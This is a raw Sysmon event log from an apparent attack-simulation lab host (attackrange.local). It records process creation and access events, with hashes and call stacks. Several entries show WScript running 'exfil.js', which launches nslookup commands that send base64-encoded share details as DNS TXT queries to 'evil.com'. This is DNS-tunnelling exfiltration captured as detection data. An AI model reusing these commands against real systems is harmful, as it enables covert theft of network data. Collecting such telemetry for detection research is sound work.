14:21:49.251{2E1864BB-18E0-629A-6742-000000005F02}39761432C:\Windows\System32\WScript.exe{2E1864BB-18FD-629A-1546-000000005F02}4004C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214875Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.264{2E1864BB-18FD-629A-1546-000000005F02}4004C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfqyfzs.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000214874Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.251{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlcgdrm.tmpMD5=CB596D298926BB7548136A14BD30FF7C,SHA256=F828C268F75B06BE1AA98CB1BF6D08702D0B68C46C1A2B67F8CB9ED67478BB62,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214873Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.235{2E1864BB-18FD-629A-1346-000000005F02}72121008C:\Windows\system32\conhost.exe{2E1864BB-18FD-629A-1446-000000005F02}32C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214872Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.235{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214871Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.235{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214870Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.235{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214869Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.235{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214868Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.235{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FD-629A-1446-000000005F02}32C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214867Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.235{2E1864BB-18FD-629A-1246-000000005F02}80365408C:\Windows\system32\cmd.exe{2E1864BB-18FD-629A-1446-000000005F02}32C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214866Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.240{2E1864BB-18FD-629A-1446-000000005F02}32C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FD-629A-1246-000000005F02}8036C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcgdrm.tmp 2>&1 10341000x8000000000000000214865Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.220{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18FD-629A-1346-000000005F02}7212C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214864Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.220{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FD-629A-1346-000000005F02}7212C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214863Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.204{2E1864BB-18FD-629A-1346-000000005F02}72121008C:\Windows\system32\conhost.exe{2E1864BB-18FD-629A-1246-000000005F02}8036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214862Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.204{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FD-629A-1346-000000005F02}7212C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214861Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.204{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214860Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.204{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214859Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.203{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214858Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.203{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214857Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.203{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FD-629A-1246-000000005F02}8036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214856Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.203{2E1864BB-18E0-629A-6742-000000005F02}39767604C:\Windows\System32\WScript.exe{2E1864BB-18FD-629A-1246-000000005F02}8036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214855Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.202{2E1864BB-18FD-629A-1246-000000005F02}8036C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcgdrm.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000214854Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.198{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlmksnd.tmpMD5=72212EBDCB2E8E793A1B2134D4FA7DE3,SHA256=B332410D88A2D1B397F1BE63E741050D785B52E6644B4C66DB2FEDBE9A959973,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214853Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.167{2E1864BB-18FD-629A-1046-000000005F02}72365176C:\Windows\system32\conhost.exe{2E1864BB-18FD-629A-1146-000000005F02}5708C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214852Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.167{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214851Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.167{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214850Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.167{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214849Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.167{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214848Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.167{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FD-629A-1146-000000005F02}5708C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214847Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.167{2E1864BB-18FD-629A-0F46-000000005F02}53807868C:\Windows\system32\cmd.exe{2E1864BB-18FD-629A-1146-000000005F02}5708C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214846Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.178{2E1864BB-18FD-629A-1146-000000005F02}5708C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FD-629A-0F46-000000005F02}5380C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmksnd.tmp 2>&1 10341000x8000000000000000214845Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 